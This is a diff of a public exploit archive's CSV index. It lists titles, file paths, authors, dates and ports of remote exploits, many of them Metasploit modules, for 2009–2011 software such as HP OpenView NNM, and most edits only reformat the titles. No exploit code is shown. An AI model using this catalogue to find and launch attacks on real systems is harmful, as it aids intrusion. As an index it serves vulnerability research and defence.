-10056,platforms/windows/remote/10056.py,"Ada Image Server 0.6.7 - imgsrv.exe Buffer Overflow",2009-10-07,blake,windows,remote,1235 +10056,platforms/windows/remote/10056.py,"Ada Image Server 0.6.7 - 'imgsrv.exe' Buffer Overflow",2009-10-07,blake,windows,remote,1235 10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 - nfx file integer Overflow",2009-10-05,bruiser,windows,remote,0 10071,platforms/multiple/remote/10071.txt,"Mozilla NSS - NULL Character CA SSL Certificate Validation Security Bypass",2009-11-10,"Dan Kaminsky",multiple,remote,0 10079,platforms/windows/remote/10079.txt,"Google Apps - mailto URI handler cross-browser Remote command Execution",2009-10-01,pyrokinesis,windows,remote,0 @@ -10487,10 +10498,10 @@ id,file,description,date,author,platform,type,port 10365,platforms/windows/remote/10365.rb,"Eureka Email 2.2q - ERR Remote Buffer Overflow (Metasploit) (1)",2009-12-09,dookie,windows,remote,0 10375,platforms/windows/remote/10375.html,"SAP GUI for Windows - 'sapirrfc.dll' ActiveX Overflow",2009-12-10,Abysssec,windows,remote,0 10380,platforms/windows/remote/10380.pl,"Sunbird 0.9 - Array Overrun Code Execution",2009-12-11,"Maksymilian Arciemowicz and sp3x",windows,remote,0 -10394,platforms/windows/remote/10394.py,"HP OpenView Network Node Manager (OV NNM) 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80 +10394,platforms/windows/remote/10394.py,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovalarm.exe' CGI Unauthenticated Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80 10434,platforms/windows/remote/10434.py,"Savant Web Server 3.1 - Remote Buffer Overflow (3)",2009-12-14,DouBle_Zer0,windows,remote,80 -10451,platforms/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - NetBiterConfig.exe Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",hardware,remote,0 -10510,platforms/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL module Clientless URL-list control Bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 +10451,platforms/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",hardware,remote,0 +10510,platforms/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL Module Clientless URL-list control Bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Remote Buffer Overflow (2)",2009-12-18,Molotov,windows,remote,69 10579,platforms/multiple/remote/10579.py,"TLS - Renegotiation (PoC)",2009-12-21,"RedTeam Pentesting",multiple,remote,0 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0 @@ -10547,7 +10558,7 @@ id,file,description,date,author,platform,type,port 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0 11886,platforms/windows/remote/11886.py,"SAP MaxDB - Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0 11973,platforms/windows/remote/11973.txt,"CompleteFTP Server - Directory Traversal",2010-03-30,zombiefx,windows,remote,0 -11974,platforms/windows/remote/11974.py,"HP OpenView Network Node Manager (OV NNM) - OvWebHelp.exe CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote,0 +11974,platforms/windows/remote/11974.py,"HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote,0 11986,platforms/linux/remote/11986.py,"OpenDcHub 0.8.1 - Remote Code Execution",2010-03-31,"Pierre Nogues",linux,remote,0 12033,platforms/multiple/remote/12033.txt,"Java Mini Web Server 1.0 - Directory Traversal / Cross-Site Scripting",2010-04-03,cp77fk4r,multiple,remote,0 12044,platforms/windows/remote/12044.c,"EasyFTP Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow",2010-04-04,x90c,windows,remote,0 @@ -10614,14 +10625,14 @@ id,file,description,date,author,platform,type,port 14091,platforms/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 (OSX) - Remote Code Execution",2010-06-28,dookie,osx,remote,0 30100,platforms/windows/remote/30100.html,"British TeleCommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",windows,remote,0 14179,platforms/windows/remote/14179.txt,"Microsoft IIS 5.0 - Authentication Bypass (MS10-065)",2010-07-02,"Soroush Dalili",windows,remote,0 -14180,platforms/windows/remote/14180.py,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 -14181,platforms/windows/remote/14181.py,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 -14182,platforms/windows/remote/14182.py,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 +14180,platforms/windows/remote/14180.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 +14181,platforms/windows/remote/14181.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 +14182,platforms/windows/remote/14182.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote Exploit",2010-07-03,dmc,windows,remote,0 14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)",2010-07-03,blake,windows,remote,0 14200,platforms/windows/remote/14200.html,"Registry OCX 1.5 - ActiveX Buffer Overflow",2010-07-04,blake,windows,remote,0 14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - Buffer Overflow (Windows 7 ASLR + DEP Bypass)",2010-07-05,Node,windows,remote,0 -14248,platforms/windows/remote/14248.py,"minerCPP 0.4b - Remote Buffer Overflow / Format String Attack Exploit",2010-07-06,l3D,windows,remote,0 +14248,platforms/windows/remote/14248.py,"minerCPP 0.4b - Remote Buffer Overflow / Format String",2010-07-06,l3D,windows,remote,0 14254,platforms/osx/remote/14254.py,"Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Exploit",2010-07-06,d1dn0t,osx,remote,0 14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 / Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0 14269,platforms/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0 @@ -10793,7 +10804,7 @@ id,file,description,date,author,platform,type,port 16245,platforms/hardware/remote/16245.py,"iphone mydocs 2.7 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0 16259,platforms/windows/remote/16259.txt,"Home FTP Server 1.12 - Directory Traversal",2011-02-28,clshack,windows,remote,0 16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt_ H@ckk3y",ios,remote,0 -16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Code Execution",2011-03-04,"Todor Donev",hardware,remote,0 +16275,platforms/hardware/remote/16275.txt,"COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution",2011-03-04,"Todor Donev",hardware,remote,0 16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0 16285,platforms/linux/remote/16285.rb,"NTP daemon readvar - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,linux,remote,0 16286,platforms/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0 @@ -10938,7 +10949,7 @@ id,file,description,date,author,platform,type,port 16432,platforms/windows/remote/16432.rb,"Firebird Relational Database - isc_create_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16433,platforms/windows/remote/16433.rb,"BomberClone 0.11.6 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16434,platforms/windows/remote/16434.rb,"Borland CaliberRM - StarTeam Multicast Service Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 -16435,platforms/windows/remote/16435.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,remote,0 +16435,platforms/windows/remote/16435.rb,"HP - 'OmniInet.exe' MSG_PROTOCOL Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,remote,0 16436,platforms/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16437,platforms/windows/remote/16437.rb,"Borland Interbase - 'isc_create_database()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16438,platforms/windows/remote/16438.rb,"eIQNetworks ESA - Topology DELETEDEVICE Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 @@ -10958,7 +10969,7 @@ id,file,description,date,author,platform,type,port 16452,platforms/windows/remote/16452.rb,"AgentX++ Master - AgentX::receive_agentx Stack Buffer Overflow (Metasploit)",2010-05-11,Metasploit,windows,remote,0 16453,platforms/windows/remote/16453.rb,"Borland Interbase - 'Create-Request' Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16454,platforms/windows/remote/16454.rb,"ShixxNOTE 6.net - Font Field Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 -16455,platforms/windows/remote/16455.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,windows,remote,0 +16455,platforms/windows/remote/16455.rb,"HP - 'OmniInet.exe' MSG_PROTOCOL Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,windows,remote,0 16456,platforms/windows/remote/16456.rb,"Realtek Media Player Playlist - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16457,platforms/windows/remote/16457.rb,"LANDesk Management Suite 8.7 - Alert Service Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0 @@ -11039,7 +11050,7 @@ id,file,description,date,author,platform,type,port 16538,platforms/windows/remote/16538.rb,"McAfee Visual Trace - ActiveX Control Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16539,platforms/windows/remote/16539.rb,"Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16540,platforms/windows/remote/16540.rb,"Zenturi ProgramChecker ActiveX - Control Arbitrary File Download (Metasploit)",2010-11-24,Metasploit,windows,remote,0 -16541,platforms/windows/remote/16541.rb,"Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (MS10-023) (Metasploit)",2010-09-28,Metasploit,windows,remote,0 +16541,platforms/windows/remote/16541.rb,"Microsoft Internet Explorer - 'Winhlp32.exe' MsgBox Code Execution (MS10-023) (Metasploit)",2010-09-28,Metasploit,windows,remote,0 16542,platforms/windows/remote/16542.rb,"Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (MS09-043) (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16543,platforms/windows/remote/16543.rb,"Novell iPrint Client - ActiveX Control Date/Time Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16544,platforms/windows/remote/16544.rb,"SonicWALL Aventail - 'epi.dll' AuthCredential Format String (Metasploit)",2010-09-20,Metasploit,windows,remote,0 @@ -11121,7 +11132,7 @@ id,file,description,date,author,platform,type,port 16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 (Windows) - 'secure' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7787 16694,platforms/windows/remote/16694.rb,"Racer 0.5.3 Beta 5 - Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,26000 16695,platforms/windows/remote/16695.rb,"Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,12203 -16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime - STMux.exe Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,1533 +16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime - 'STMux.exe' Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,1533 16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server - Accept-Language Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,80 16698,platforms/windows/remote/16698.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) (MS07-017) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16699,platforms/windows/remote/16699.rb,"Microsoft Outlook - ATTACH_BY_REF_RESOLVE File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 @@ -11199,13 +11210,13 @@ id,file,description,date,author,platform,type,port 16771,platforms/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow (Metasploit)",2010-08-17,Metasploit,windows,remote,8080 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)",2010-08-06,Metasploit,windows,remote,80 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server - Host Header Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8028 -16774,platforms/windows/remote/16774.rb,"HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit)",2010-10-12,Metasploit,windows,remote,0 +16774,platforms/windows/remote/16774.rb,"HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - 'OVAS.exe' Unauthenticated Stack Buffer Overflow (Metasploit)",2010-10-12,Metasploit,windows,remote,0 16775,platforms/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote,0 16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,0 16777,platforms/windows/remote/16777.rb,"Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,80 16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro - LoginAdmin Password Stack Buffer Overflow (Metasploit)",2010-12-15,Metasploit,windows,remote,18881 16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8800 -16780,platforms/cgi/remote/16780.rb,"HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,cgi,remote,0 +16780,platforms/cgi/remote/16780.rb,"HP OpenView Network Node Manager (OV NNM) - 'Snmp.exe' CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,cgi,remote,0 16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0 16782,platforms/win_x86/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,win_x86,remote,0 16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0 @@ -11215,12 +11226,12 @@ id,file,description,date,author,platform,type,port 16787,platforms/windows/remote/16787.rb,"IPSwitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit)",2010-07-14,Metasploit,windows,remote,0 16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,multiple,remote,8080 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999 -16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 +16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs - 'webquery.dll' Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,80 16794,platforms/windows/remote/16794.rb,"httpdx - 'tolog()' Function Format String (Metasploit) (2)",2010-08-25,Metasploit,windows,remote,80 -16795,platforms/cgi/remote/16795.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,cgi,remote,0 +16795,platforms/cgi/remote/16795.rb,"HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,cgi,remote,0 16796,platforms/windows/remote/16796.rb,"BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote,80 -16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager (OV NNM) - ovalarm.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 +16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovalarm.exe' CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16798,platforms/windows/remote/16798.rb,"Apache Tomcat mod_jk 1.2.20 - Buffer Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 16799,platforms/windows/remote/16799.rb,"httpdx - h_handlepeer() Function Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0 16800,platforms/windows/remote/16800.rb,"Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow (Metasploit)",2010-06-11,Metasploit,windows,remote,8000 @@ -11228,12 +11239,12 @@ id,file,description,date,author,platform,type,port 16802,platforms/windows/remote/16802.rb,"Webster HTTP Server - GET Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote,0 16803,platforms/windows/remote/16803.rb,"Alt-N SecurityGateway 1.0.1 - 'Username' Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,4000 16804,platforms/windows/remote/16804.rb,"Belkin Bulldog Plus - Web Service Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 -16805,platforms/windows/remote/16805.rb,"HP OpenView Network Node Manager - OpenView5.exe CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 +16805,platforms/windows/remote/16805.rb,"HP OpenView Network Node Manager (OV NNM) - 'OpenView5.exe' CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 16806,platforms/windows/remote/16806.rb,"BadBlue 2.72b - PassThru Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote,0 16807,platforms/windows/remote/16807.rb,"InterSystems Cache - UtilConfigHome.csp Argument Buffer Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,57772 16808,platforms/windows/remote/16808.rb,"NaviCOPA Web Server 2.0.1 - URL Handling Buffer Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80 16809,platforms/win_x86/remote/16809.rb,"Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,8080 -16810,platforms/windows/remote/16810.rb,"IBM TPM for OS Deployment 5.1.0.x - rembo.exe Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,443 +16810,platforms/windows/remote/16810.rb,"IBM TPM for OS Deployment 5.1.0.x - 'rembo.exe' Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,443 16811,platforms/windows/remote/16811.rb,"TrackerCam - PHP Argument Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8090 16812,platforms/windows/remote/16812.rb,"Alt-N MDaemon 6.8.5 - WorldClient form2raw.cgi Stack Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,3000 16813,platforms/windows/remote/16813.rb,"Novell NetMail 3.52d - NMAP STOR Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,689 @@ -11252,7 +11263,7 @@ id,file,description,date,author,platform,type,port 16826,platforms/windows/remote/16826.rb,"Symantec Alert Management System Intel Alert Originator Service - Buffer Overflow (Metasploit)",2010-05-13,Metasploit,windows,remote,38292 16827,platforms/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16828,platforms/windows/remote/16828.rb,"Trend Micro ServerProtect 5.58 - CreateBinding() Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16829,platforms/windows/remote/16829.rb,"Trend Micro ServerProtect 5.58 - EarthAgent.exe Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16829,platforms/windows/remote/16829.rb,"Trend Micro ServerProtect 5.58 - 'EarthAgent.exe' Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16830,platforms/windows/remote/16830.rb,"Symantec Remote Management - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16831,platforms/windows/remote/16831.rb,"SafeNet SoftRemote - IKE Service Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,62514 16832,platforms/netware/remote/16832.rb,"Novell NetWare - LSASS CIFS.NLM Driver Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,netware,remote,0 @@ -11331,18 +11342,18 @@ id,file,description,date,author,platform,type,port 17024,platforms/windows/remote/17024.txt,"7-Technologies IGSS 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 17027,platforms/windows/remote/17027.rb,"Adobe Flash Player - AVM Bytecode Verification (Metasploit)",2011-03-23,Metasploit,windows,remote,0 17028,platforms/windows/remote/17028.rb,"HP OpenView Network Node Manager (OV NNM) - nnmRptConfig nameParams Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 -17029,platforms/windows/remote/17029.rb,"HP Network Node Manager (NMM) - CGI webappmon.exe OvJavaLocale Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 -17030,platforms/windows/remote/17030.rb,"HP Network Node Manager (NMM) - CGI webappmon.exe execvp Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 +17029,platforms/windows/remote/17029.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe' 'OvJavaLocale' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 +17030,platforms/windows/remote/17030.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe' 'execvp' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 17031,platforms/linux/remote/17031.rb,"Distributed Ruby - send syscall (Metasploit)",2011-03-23,Metasploit,linux,remote,0 17034,platforms/windows/remote/17034.py,"Progea Movicon 11 - TCPUploadServer Remote Exploit",2011-03-23,"Jeremy Brown",windows,remote,0 -17038,platforms/windows/remote/17038.rb,"HP OpenView Network Node Manager (OV NNM) - nnmRptConfig.exe schdParams Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 -17039,platforms/windows/remote/17039.rb,"HP OpenView Network Node Manager - snmpviewer.exe Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 -17040,platforms/windows/remote/17040.rb,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (ICount) CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 -17041,platforms/windows/remote/17041.rb,"HP OpenView Network Node Manager (OV NNM) - ovwebsnmpsrv.exe main Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 -17042,platforms/windows/remote/17042.rb,"HP OpenView Network Node Manager (OV NNM) getnnmdata.exe (MaxAge) CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 -17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 -17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe ovutil Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 -17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (Hostname) CGI Buffer Overflow (Metasploit)",2011-03-25,Metasploit,windows,remote,0 +17038,platforms/windows/remote/17038.rb,"HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe' 'schdParams' Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 +17039,platforms/windows/remote/17039.rb,"HP OpenView Network Node Manager (OV NNM) - 'snmpviewer.exe' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 +17040,platforms/windows/remote/17040.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' 'ICount' CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 +17041,platforms/windows/remote/17041.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' 'main' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 +17042,platforms/windows/remote/17042.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' (MaxAge) CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 +17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' Unrecognized Option Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 +17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' 'ovutil' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 +17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' 'Hostname' CGI Buffer Overflow (Metasploit)",2011-03-25,Metasploit,windows,remote,0 17048,platforms/windows/remote/17048.rb,"VideoLAN VLC Media Player 1.1.4 - 'AMV' Dangling Pointer (Metasploit)",2011-03-26,Metasploit,windows,remote,0 17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0 17058,platforms/linux/remote/17058.rb,"Distributed Ruby - Send instance_eval/syscall Code Execution (Metasploit)",2011-03-27,Metasploit,linux,remote,0 @@ -11371,7 +11382,7 @@ id,file,description,date,author,platform,type,port 17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI - ActiveX Buffer Overflow (Metasploit)",2011-05-10,Metasploit,windows,remote,0 17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download",2011-05-13,LiquidWorm,hardware,remote,0 17290,platforms/hardware/remote/17290.txt,"XtreamerPRO Media-player 2.6.0 / 2.7.0 - Multiple Vulnerabilities",2011-05-16,"Itzik Chen",hardware,remote,0 -17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow (Metasploit)",2011-05-16,Metasploit,windows,remote,0 +17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS 9.00.00 b11063 - 'IGSSdataServer.exe' Stack Overflow (Metasploit)",2011-05-16,Metasploit,windows,remote,0 17304,platforms/windows/remote/17304.txt,"Cisco Unified Operations Manager - Multiple Vulnerabilities",2011-05-18,"Sense of Security",windows,remote,0 17328,platforms/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote,0 17345,platforms/windows/remote/17345.py,"HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution (PoC)",2011-05-29,fdiskyou,windows,remote,0 @@ -11387,7 +11398,7 @@ id,file,description,date,author,platform,type,port 17373,platforms/windows/remote/17373.py,"ActFax Server FTP - Authenticated Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0 17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow (Metasploit)",2011-06-09,Metasploit,windows,remote,0 17381,platforms/windows/remote/17381.txt,"simple Web-Server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0 -17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow (Metasploit)",2011-06-27,Metasploit,windows,remote,0 +17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - 'streamprocess.exe' Buffer Overflow (Metasploit)",2011-06-27,Metasploit,windows,remote,0 17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager - POST Query Buffer Overflow (Metasploit)",2011-06-12,Metasploit,windows,remote,0 